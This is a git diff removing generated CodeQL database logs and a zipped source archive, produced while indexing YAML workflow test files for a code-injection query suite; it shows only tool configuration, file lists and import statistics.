- "description" : "The Python extractor uses platform-dependent heuristics to determine the name of the Python executable to use. Specifying a value for this option overrides the name of the Python executable used by the extractor. Accepted values are py, python and python3. 
Use this setting with caution, the Python extractor requires Python 3 to run.\n",
- "type" : "string",
- "pattern" : "^(py|python|python3)$"
- }
- }
- }
- ],
- "java" : [
- {
- "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/java",
- "extractor_options" : {
- "exclude" : {
- "title" : "A glob excluding files from analysis.",
- "description" : "A glob indicating what files to exclude from the analysis.\n",
- "type" : "string"
- },
- "add_prefer_source" : {
- "title" : "Whether to always prefer source files over class files.",
- "description" : "A value indicating whether source files should be preferred over class files. If set to 'true', the extraction adds '-Xprefer:source' to the javac command line. If set to 'false', the extraction uses the default javac behavior ('-Xprefer:newer'). The default is 'true'.\n",
- "type" : "string",
- "pattern" : "^(false|true)$"
- },
- "buildless" : {
- "title" : "Whether to use buildless (standalone) extraction (experimental).",
- "description" : "A value indicating, which type of extraction the autobuilder should perform. If 'true', then the standalone extractor will be used, otherwise tracing extraction will be performed. The default is 'false'. 
Note that buildless extraction will generally yield less accurate analysis results, and should only be used in cases where it is not possible to build the code (for example if it uses inaccessible dependencies).\n",
- "type" : "string",
- "pattern" : "^(false|true)$"
- }
- }
- }
- ],
- "html" : [
- {
- "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/html"
- }
- ],
- "xml" : [
- {
- "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/xml"
- }
- ],
- "properties" : [
- {
- "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/properties"
- }
- ],
- "cpp" : [
- {
- "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/cpp",
- "extractor_options" : { }
- }
- ],
- "swift" : [
- {
- "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/swift"
- }
- ],
- "csv" : [
- {
- "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/csv"
- }
- ],
- "yaml" : [
- {
- "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/yaml"
- }
- ],
- "csharp" : [
- {
- "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/csharp",
- "extractor_options" : {
- "trap" : {
- "title" : "Options pertaining to TRAP.",
- "description" : "Options pertaining to TRAP.",
- "type" : "object",
- "properties" : {
- "compression" : {
- "title" : "Controls compression for the TRAP files written by the extractor.",
- "description" : "This option is only intended for use in debugging the extractor. 
Accepted values are 'brotli' (the default, to write brotli-compressed TRAP), 'gzip', and 'none' (to write uncompressed TRAP).\n",
- "type" : "string",
- "pattern" : "^(none|gzip|brotli)$"
- }
- }
- },
- "buildless" : {
- "title" : "Whether to use buildless (standalone) extraction.",
- "description" : "A value indicating, which type of extraction the autobuilder should perform. If 'true', then the standalone extractor will be used, otherwise tracing extraction will be performed. The default is 'false'. Note that buildless extraction will generally yield less accurate analysis results, and should only be used in cases where it is not possible to build the code (for example if it uses inaccessible dependencies).\n",
- "type" : "string",
- "pattern" : "^(false|true)$"
- },
- "cil" : {
- "title" : "Whether to enable CIL extraction.",
- "description" : "A value indicating, whether CIL extraction should be enabled. The default is 'true'.\n",
- "type" : "string",
- "pattern" : "^(false|true)$"
- },
- "logging" : {
- "title" : "Options pertaining to logging.",
- "description" : "Options pertaining to logging.",
- "type" : "object",
- "properties" : {
- "verbosity" : {
- "title" : "Extractor logging verbosity level.",
- "description" : "Controls the level of verbosity of the extractor. 
The supported levels are (in order of increasing verbosity):\n - off\n - errors\n - warnings\n - info or progress\n - debug or progress+\n - trace or progress++\n - progress+++\n",
- "type" : "string",
- "pattern" : "^(off|errors|warnings|(info|progress)|(debug|progress\\+)|(trace|progress\\+\\+)|progress\\+\\+\\+)$"
- }
- }
- }
- }
- }
- ],
- "javascript" : [
- {
- "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/javascript",
- "extractor_options" : {
- "skip_types" : {
- "title" : "Skip type extraction for TypeScript",
- "description" : "Whether to skip the extraction of types in a TypeScript application",
- "type" : "string",
- "pattern" : "^(false|true)$"
- }
- }
- }
- ],
- "ruby" : [
- {
- "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/ruby",
- "extractor_options" : {
- "trap" : {
- "title" : "Options pertaining to TRAP.",
- "description" : "Options pertaining to TRAP.",
- "type" : "object",
- "properties" : {
- "compression" : {
- "title" : "Controls compression for the TRAP files written by the extractor.",
- "description" : "This option is only intended for use in debugging the extractor. Accepted values are 'gzip' (the default, to write gzip-compressed TRAP) and 'none' (to write uncompressed TRAP).\n",
- "type" : "string",
- "pattern" : "^(none|gzip)$"
- }
- }
- }
- }
- }
- ]
- }
- }
-[2024-03-01 13:05:58] [PROGRESS] database init> Calculating baseline information in /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094
-[2024-03-01 13:05:58] [SPAMMY] database init> Ignoring the following directories when processing baseline information: .git, .hg, .svn.
-[2024-03-01 13:05:58] [DETAILS] database init> Running command in /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094: /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/tools/osx64/scc --by-file --exclude-dir .git,.hg,.svn --format json --no-large --no-min .
-[2024-03-01 13:05:58] [PROGRESS] database init> Calculated baseline information for languages: (71ms).
-[2024-03-01 13:05:58] [PROGRESS] database init> Resolving extractor yaml.
-[2024-03-01 13:05:58] [DETAILS] database init> Found candidate extractor root for yaml: /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/yaml.
-[2024-03-01 13:05:58] [PROGRESS] database init> Successfully loaded extractor YAML (yaml) from /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/yaml.
-[2024-03-01 13:05:58] [PROGRESS] database init> Created skeleton CodeQL database at /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db. This in-progress database is ready to be populated by an extractor.
-[2024-03-01 13:05:58] Plumbing command codeql database init completed.
-[2024-03-01 13:05:58] [PROGRESS] database create> Running build command: []
-[2024-03-01 13:05:58] Running plumbing command: codeql database trace-command --working-dir=/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094 --index-traceless-dbs --no-db-cluster -- /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db
-[2024-03-01 13:05:58] Using autobuild script /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/yaml/tools/autobuild.sh.
-[2024-03-01 13:05:58] [PROGRESS] database trace-command> Running command in /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094: [/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/yaml/tools/autobuild.sh]
-[2024-03-01 13:05:59] [build-stderr] Scanning for files in /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094...
-[2024-03-01 13:05:59] [build-stderr] /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db: Indexing files in in /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094...
-[2024-03-01 13:05:59] [build-stderr] Running command in /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094: [/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/yaml/tools/index-files.sh, /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db/working/files-to-index11395055735303062068.list]
-[2024-03-01 13:05:59] Plumbing command codeql database trace-command completed.
-[2024-03-01 13:05:59] [PROGRESS] database create> Finalizing database at /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db.
-[2024-03-01 13:05:59] Running plumbing command: codeql database finalize --mode=trim --no-db-cluster -- /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db
-[2024-03-01 13:05:59] [PROGRESS] database finalize> Running TRAP import for CodeQL database at /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db...
-[2024-03-01 13:05:59] Running plumbing command: codeql dataset import --dbscheme=/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/yaml/yaml.dbscheme -- /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db/db-yaml /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db/trap/yaml
-[2024-03-01 13:05:59] Clearing disk cache since the version file /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db/db-yaml/default/cache/version does not exist
-[2024-03-01 13:05:59] Tuple pool not found. Clearing relations with cached strings
-[2024-03-01 13:05:59] Trimming disk cache at /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db/db-yaml/default/cache in mode clear.
-[2024-03-01 13:05:59] Sequence stamp origin is -6212520902965462594
-[2024-03-01 13:05:59] Pausing evaluation to hard-clear memory at sequence stamp o+0
-[2024-03-01 13:05:59] Unpausing evaluation
-[2024-03-01 13:05:59] Pausing evaluation to quickly trim disk at sequence stamp o+1
-[2024-03-01 13:05:59] Unpausing evaluation
-[2024-03-01 13:05:59] Pausing evaluation to zealously trim disk at sequence stamp o+2
-[2024-03-01 13:05:59] Unpausing evaluation
-[2024-03-01 13:05:59] Trimming completed (6ms): Purged everything.
-[2024-03-01 13:05:59] Scanning for files in /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db/trap/yaml
-[2024-03-01 13:05:59] Found 27 TRAP files (71.04 KiB)
-[2024-03-01 13:05:59] [PROGRESS] dataset import> Importing TRAP files
-[2024-03-01 13:05:59] Importing argus_case_study.yml.trap.gz (1 of 27)
-[2024-03-01 13:05:59] Importing changed-files.yml.trap.gz (2 of 27)
-[2024-03-01 13:05:59] Importing comment_issue.yml.trap.gz (3 of 27)
-[2024-03-01 13:05:59] Importing comment_issue_newline.yml.trap.gz (4 of 27)
-[2024-03-01 13:05:59] Importing cross1.yml.trap.gz (5 of 27)
-[2024-03-01 13:05:59] Importing cross2.yml.trap.gz (6 of 27)
-[2024-03-01 13:05:59] Importing cross3.yml.trap.gz (7 of 27)
-[2024-03-01 13:05:59] Importing discussion.yml.trap.gz (8 of 27)
-[2024-03-01 13:05:59] Importing discussion_comment.yml.trap.gz (9 of 27)
-[2024-03-01 13:05:59] Importing gollum.yml.trap.gz (10 of 27)
-[2024-03-01 13:05:59] Importing image_link_generator.yml.trap.gz (11 of 27)
-[2024-03-01 13:05:59] Importing inter-job.yml.trap.gz (12 of 27)
-[2024-03-01 13:05:59] Importing issues.yaml.trap.gz (13 of 27)
-[2024-03-01 13:05:59] Importing matrix.yml.trap.gz (14 of 27)
-[2024-03-01 13:05:59] Importing no-flow1.yml.trap.gz (15 of 27)
-[2024-03-01 13:05:59] Importing no-flow2.yml.trap.gz (16 of 27)
-[2024-03-01 13:05:59] Importing pull_request_review.yml.trap.gz (17 of 27)
-[2024-03-01 13:05:59] Importing pull_request_review_comment.yml.trap.gz (18 of 27)
-[2024-03-01 13:05:59] Importing pull_request_target.yml.trap.gz (19 of 27)
-[2024-03-01 13:05:59] Importing push.yml.trap.gz (20 of 27)
-[2024-03-01 13:05:59] Importing simple1.yml.trap.gz (21 of 27)
-[2024-03-01 13:05:59] Importing simple2.yml.trap.gz (22 of 27)
-[2024-03-01 13:05:59] Importing test.yml.trap.gz (23 of 27)
-[2024-03-01 13:05:59] Importing workflow_run.yml.trap.gz (24 of 27)
-[2024-03-01 13:05:59] Importing action.yml.trap.gz (25 of 27)
-[2024-03-01 13:05:59] Importing action.yml.trap.gz (26 
of 27)
-[2024-03-01 13:05:59] Importing sourceLocationPrefix.trap.gz (27 of 27)
-[2024-03-01 13:05:59] [PROGRESS] dataset import> Merging relations
-[2024-03-01 13:05:59] Merging 1 fragment for 'files'.
-[2024-03-01 13:05:59] Merged 208 bytes for 'files'.
-[2024-03-01 13:05:59] Merging 1 fragment for 'folders'.
-[2024-03-01 13:05:59] Merged 128 bytes for 'folders'.
-[2024-03-01 13:05:59] Merging 1 fragment for 'containerparent'.
-[2024-03-01 13:05:59] Merged 328 bytes for 'containerparent'.
-[2024-03-01 13:05:59] Merging 1 fragment for 'yaml_scalars'.
-[2024-03-01 13:05:59] Merged 12540 bytes (12.25 KiB) for 'yaml_scalars'.
-[2024-03-01 13:05:59] Merging 1 fragment for 'yaml'.
-[2024-03-01 13:05:59] Merged 33384 bytes (32.60 KiB) for 'yaml'.
-[2024-03-01 13:05:59] Merging 1 fragment for 'locations_default'.
-[2024-03-01 13:05:59] Merged 33384 bytes (32.60 KiB) for 'locations_default'.
-[2024-03-01 13:05:59] Merging 1 fragment for 'yaml_locations'.
-[2024-03-01 13:05:59] Merged 11128 bytes (10.87 KiB) for 'yaml_locations'.
-[2024-03-01 13:05:59] Merging 1 fragment for 'sourceLocationPrefix'.
-[2024-03-01 13:05:59] Merged 4 bytes for 'sourceLocationPrefix'.
-[2024-03-01 13:05:59] Saving string and id pools to disk.
-[2024-03-01 13:05:59] Finished importing TRAP files.
-[2024-03-01 13:05:59] Read 360.45 KiB of uncompressed TRAP data.
-[2024-03-01 13:05:59] Relation data size: 88.97 KiB (merge rate: 1.39 MiB/s)
-[2024-03-01 13:05:59] String pool size: 2.06 MiB
-[2024-03-01 13:05:59] ID pool size: 1.08 MiB
-[2024-03-01 13:05:59] [PROGRESS] dataset import> Finished writing database (relations: 88.97 KiB; string pool: 2.06 MiB).
-[2024-03-01 13:05:59] Pausing evaluation to close the cache at sequence stamp o+3
-[2024-03-01 13:05:59] The disk cache is freshly trimmed; leave it be.
-[2024-03-01 13:05:59] Unpausing evaluation
-[2024-03-01 13:05:59] Plumbing command codeql dataset import completed.
-[2024-03-01 13:05:59] [PROGRESS] database finalize> TRAP import complete (560ms).
-[2024-03-01 13:05:59] Running plumbing command: codeql database cleanup --mode=trim -- /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db
-[2024-03-01 13:05:59] [PROGRESS] database cleanup> Cleaning up existing TRAP files after import...
-[2024-03-01 13:05:59] [PROGRESS] database cleanup> TRAP files cleaned up (13ms).
-[2024-03-01 13:05:59] [PROGRESS] database cleanup> Cleaning up scratch directory...
-[2024-03-01 13:05:59] [PROGRESS] database cleanup> Scratch directory cleaned up (1ms).
-[2024-03-01 13:05:59] Running plumbing command: codeql dataset cleanup --mode=trim -- /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db/db-yaml
-[2024-03-01 13:05:59] [PROGRESS] dataset cleanup> Cleaning up dataset in /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db/db-yaml.
-[2024-03-01 13:05:59] Trimming disk cache at /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db/db-yaml/default/cache in mode trim.
-[2024-03-01 13:05:59] Sequence stamp origin is -6212520900610201313
-[2024-03-01 13:05:59] Pausing evaluation to quickly trim memory at sequence stamp o+0
-[2024-03-01 13:05:59] Unpausing evaluation
-[2024-03-01 13:05:59] Pausing evaluation to zealously trim disk at sequence stamp o+1
-[2024-03-01 13:05:59] Unpausing evaluation
-[2024-03-01 13:06:00] Trimming completed (3ms): Trimmed disposable data from cache.
-[2024-03-01 13:06:00] Pausing evaluation to close the cache at sequence stamp o+2
-[2024-03-01 13:06:00] The disk cache is freshly trimmed; leave it be.
-[2024-03-01 13:06:00] Unpausing evaluation
-[2024-03-01 13:06:00] [PROGRESS] dataset cleanup> Trimmed disposable data from cache.
-[2024-03-01 13:06:00] [PROGRESS] dataset cleanup> Finalizing dataset in /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db/db-yaml
-[2024-03-01 13:06:00] [DETAILS] dataset cleanup> Finished deleting ID pool from /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db/db-yaml (3ms).
-[2024-03-01 13:06:00] Plumbing command codeql dataset cleanup completed.
-[2024-03-01 13:06:00] Plumbing command codeql database cleanup completed with status 0.
-[2024-03-01 13:06:00] [PROGRESS] database finalize> Finished zipping source archive (20.00 KiB).
-[2024-03-01 13:06:00] Plumbing command codeql database finalize completed.
-[2024-03-01 13:06:00] [PROGRESS] database create> Successfully created database at /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db.
-[2024-03-01 13:06:00] Terminating normally.
diff --git a/db/log/database-index-files-20240301.130558.974.log b/db/log/database-index-files-20240301.130558.974.log
deleted file mode 100644
index e204c6df37d0..000000000000
--- a/db/log/database-index-files-20240301.130558.974.log
+++ /dev/null
@@ -1,44 +0,0 @@
-[2024-03-01 13:05:58] This is codeql database index-files --include-extension=.yaml --include-extension=.yml --size-limit=5m --language=yaml /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db
-[2024-03-01 13:05:58] Log file was started late.
-[2024-03-01 13:05:59] Using index-files script /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/yaml/tools/index-files.sh.
-[2024-03-01 13:05:59] [PROGRESS] database index-files> Scanning for files in /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094...
-[2024-03-01 13:05:59] Calling plumbing command: codeql resolve files --include-extension=.yaml --include-extension=.yml --size-limit=5m /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094 --format=json
-[2024-03-01 13:05:59] [PROGRESS] resolve files> Scanning /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094...
-[2024-03-01 13:05:59] [PROGRESS] resolve files> Scanning /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/action2...
-[2024-03-01 13:05:59] [PROGRESS] resolve files> Scanning /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github...
-[2024-03-01 13:05:59] [PROGRESS] resolve files> Scanning /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows...
-[2024-03-01 13:05:59] [PROGRESS] resolve files> Scanning /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/action1...
-[2024-03-01 13:05:59] Plumbing command codeql resolve files completed:
- [
- "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/action2/action.yml",
- "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/cross1.yml",
- "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/cross3.yml",
- "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/cross2.yml",
- "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/argus_case_study.yml",
- "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/changed-files.yml",
- "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/image_link_generator.yml",
- "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue_newline.yml",
- "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml",
- "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.yml",
- "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review.yml",
- "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/push.yml",
- "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue.yml",
- 
"/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/no-flow1.yml",
- "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/no-flow2.yml",
- "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job.yml",
- "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/matrix.yml",
- "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/issues.yaml",
- "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review_comment.yml",
- "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion.yml",
- "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run.yml",
- "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple1.yml",
- "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple2.yml",
- "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/gollum.yml",
- "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion_comment.yml",
- "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/action1/action.yml"
- ]
-[2024-03-01 13:05:59] [DETAILS] database index-files> Found 26 files.
-[2024-03-01 13:05:59] [PROGRESS] database index-files> /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db: Indexing files in in /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094...
-[2024-03-01 13:05:59] Using index-files script /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/yaml/tools/index-files.sh.
-[2024-03-01 13:05:59] [PROGRESS] database index-files> Running command in /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094: [/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/yaml/tools/index-files.sh, /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db/working/files-to-index11395055735303062068.list]
-[2024-03-01 13:05:59] Terminating normally.
diff --git a/db/src.zip b/db/src.zip deleted file mode 100644 index 3006b787babfbfd5da405e1a7f5736ea762e4abe..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 20479 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 